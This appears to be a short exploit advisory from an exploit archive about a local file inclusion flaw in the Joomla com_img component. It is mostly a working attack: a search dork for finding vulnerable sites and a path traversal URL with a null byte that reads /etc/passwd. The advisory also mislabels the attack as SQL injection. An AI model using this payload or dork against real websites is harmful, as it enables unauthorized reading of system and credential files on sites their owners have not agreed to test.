id: 14779
date: 11/10/2010
title: Joomla Component com_img LFI Vulnerability
author: CoBRa_21
cves: 

==========================================
Joomla Component com_img LFI Vulnerability
==========================================

################################################################################################################
Author : CoBRa_21
Dork : inurl:com_img
################################################################################################################
Sql Injection :
http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00
################################################################################################################



#  0day.today [2023-03-27]  #